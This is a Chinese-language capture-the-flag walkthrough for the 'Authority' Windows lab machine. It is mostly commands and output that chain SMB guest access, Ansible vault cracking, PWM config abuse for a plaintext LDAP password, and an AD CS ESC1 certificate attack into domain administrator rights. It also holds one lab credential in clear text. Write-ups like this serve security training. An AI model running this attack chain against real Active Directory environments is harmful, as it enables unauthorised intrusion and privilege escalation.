Authority
Authority
Machine:Windows
Level:Medium
信息收集
Nmap
└─# nmap -p 53,80,88,135,139,389,445,8443 -sC -sV 10.10.11.222
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-09-10T16:33:43+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
445/tcp open microsoft-ds?
8443/tcp open ssl/https-alt
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2023-09-08T16:05:31
|_Not valid after: 2025-09-10T03:43:55
Host script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-10T16:33:28
|_ start_date: N/A
获取访问权限
SMB获取Ansible Creds
└─# ./kerbrute userenum -d authority.htb --dc 10.10.11.222 userlist.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/10/23 - Ronnie Flathers @ropnop
2023/09/10 12:43:38 > Using KDC(s):
2023/09/10 12:43:38 > 10.10.11.222:88
2023/09/10 12:44:04 > [+] VALID USERNAME: guest@authority.htb
2023/09/10 12:44:57 > [+] VALID USERNAME: administrator@authority.htb
发现smb有一个guest账户,尝试使用无密码登录查看
└─# smbclient -L 10.10.11.222 -U guest%
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Department Shares Disk
Development Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
依次执行recurse on -> prompt off -> mget *将文件下载,查看共享的文件,在\Automation\Ansible\PWM\下可以看到多个配置文件
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"
pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true
pwm_require_ssl: false
pwm_admin_login: !vault |
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
pwm_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764
使用john解密得到密码并使用密码破解hash.ymal,按照这种方法可以获取另外两个密码。
└─# ansible2john hash.ymal > hash.txt
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 128/128 AVX 4x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@#$%^&* (hash.ymal)
1g 0:00:00:11 DONE (2023-09-11 12:05) 0.08710g/s 3467p/s 3467c/s 3467C/s 051790..victor2
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
└─# cat hash.ymal| ansible-vault decrypt
Vault password:
Decryption successful
svc_pwm
获取账号密码
80 端口是 IIS 服务并没有别的事情,当尝试访问 8443 端口时提示我们需要 TLS。
Bad Request
This combination of host and port requires TLS.
使用 HTTPS 访问重定向到/pwm/private/login,我们有密码可以访问/pwm/private/config/manager并在页面中下载configuration,文件中有文件中有如下提示
This configuration file has been auto-generated by the PWM password self service application.
WARNING: This configuration file contains sensitive security information, please handle with care!
WARNING: If a server is currently running using this configuration file, it will be restarted and the configuration updated immediately when it is modified.
NOTICE: This file is encoded as UTF-8. Do not save or edit this file with an editor that does not support UTF-8 encoding.
If unable to edit using the application ConfigurationEditor web UI, the following options are available:
1. Edit this file directly by hand.
2. Remove restrictions of the configuration by setting the property "configIsEditable" to "true". This will allow access to the ConfigurationEditor web UI without having to authenticate to an LDAP server first.
If you wish for sensitive values in this configuration file to be stored unencrypted, set the property "storePlaintextValues" to "true".
更具上面的提示我们在config中添加<property key="storePlaintextValues">true</property>并上传。
<setting key="ldap.proxy.password" modifyTime="2022-08-11T01:46:23Z" profile="default" syntax="PASSWORD" syntaxVersion="0">
<label>LDAP ⇨ LDAP Directories ⇨ default ⇨ Connection ⇨ LDAP Proxy Password</label>
<value>PLAIN:[Deleted]</value>
</setting>
<setting key="ldap.proxy.username" modifyTime="2022-08-11T01:46:23Z" profile="default" syntax="STRING" syntaxVersion="0">
<label>LDAP ⇨ LDAP Directories ⇨ default ⇨ Connection ⇨ LDAP Proxy User</label>
<value>CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb</value>
</setting>
连接
└─# evil-winrm -i 10.10.11.222 -u svc_ldap -p [Deleted]
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_ldap\Documents>
权限提升
运行Certipy查找易受攻击的证书模板
└─# certipy find -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -dc-ip 10.10.11.222
Certipy v4.8.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Saved BloodHound data to '20230911133820_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20230911133820_Certipy.txt'
[*] Saved JSON output to '20230911133820_Certipy.json'
在20230911133820_Certipy.txt中发现ESC1漏洞
1
Template Name : CorpVPN
Display Name : Corp VPN
Certificate Authorities : AUTHORITY-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : AutoEnrollmentCheckUserDsCertificate
PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Document Signing
IP security IKE intermediate
IP security use
KDC Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 20 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : AUTHORITY.HTB\Domain Computers
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Object Control Permissions
Owner : AUTHORITY.HTB\Administrator
Write Owner Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Dacl Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Property Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'AUTHORITY.HTB\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
验证用户的权限后,我们发现可以使用域用户的凭据在 Active Directory 中添加新的计算机帐户。在这种情况下,我们使用 impacket-addcomputer 工具。
└─# impacket-addcomputer authority.htb/svc_ldap:'[Deleted]' -computer-name Hak$ -computer-pass Password123
Impacket v0.12.0.dev1+20230817.32422.a769683f - Copyright 2023 Fortra
[*] Successfully added machine account Hak$ with password Password123.
使用 Certipy,我们使用计算机帐户Hak$、密码Password123和模板 CorpVPN 生成证书请求,这将允许我们升级权限。
└─# certipy req -u 'Hak$' -p 'Password123' -ca AUTHORITY-CA -target authority.htb -template CorpVPN -upn administrator@authority.htb -dns authority.authority.htb -dc-ip 10.10.11.222
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with multiple identifications
UPN: 'administrator@authority.htb'
DNS Host Name: 'authority.authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_authority.pfx'
接下来,我们生成了两个新证书:一个不包含私钥,另一个不包含证书。
└─# certipy cert -pfx administrator_authority.pfx -nokey -out user.crt
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Writing certificate and to 'user.crt'
└─# certipy cert -pfx administrator_authority.pfx -nocert -out user.key
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Writing private key to 'user.key'
现在,使用passthecert.py工具,我们可以使用证书对 LDAPS 服务器进行身份验证,从而将我们的用户添加到管理员组。
└─# python3 /home/kali/script/passthecert.py -action ldap-shell -crt user.crt -key user.key -domain authority.htb -dc-ip 10.10.11.222
Impacket v0.12.0.dev1+20230817.32422.a769683f - Copyright 2023 Fortra
Type help for list of commands
# add_user_to_group svc_ldap Administrators
Adding user: svc_ldap to group Administrators result: OK
通过这种方式,我们成功地入侵了这台机器。
└─# evil-winrm -i 10.10.11.222 -u svc_ldap -p [Deleted]
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> net user svc_ldap
User name svc_ldap
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/10/2022 9:29:31 PM
Password expires Never
Password changeable 8/11/2022 9:29:31 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/20/2023 1:27:12 PM
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.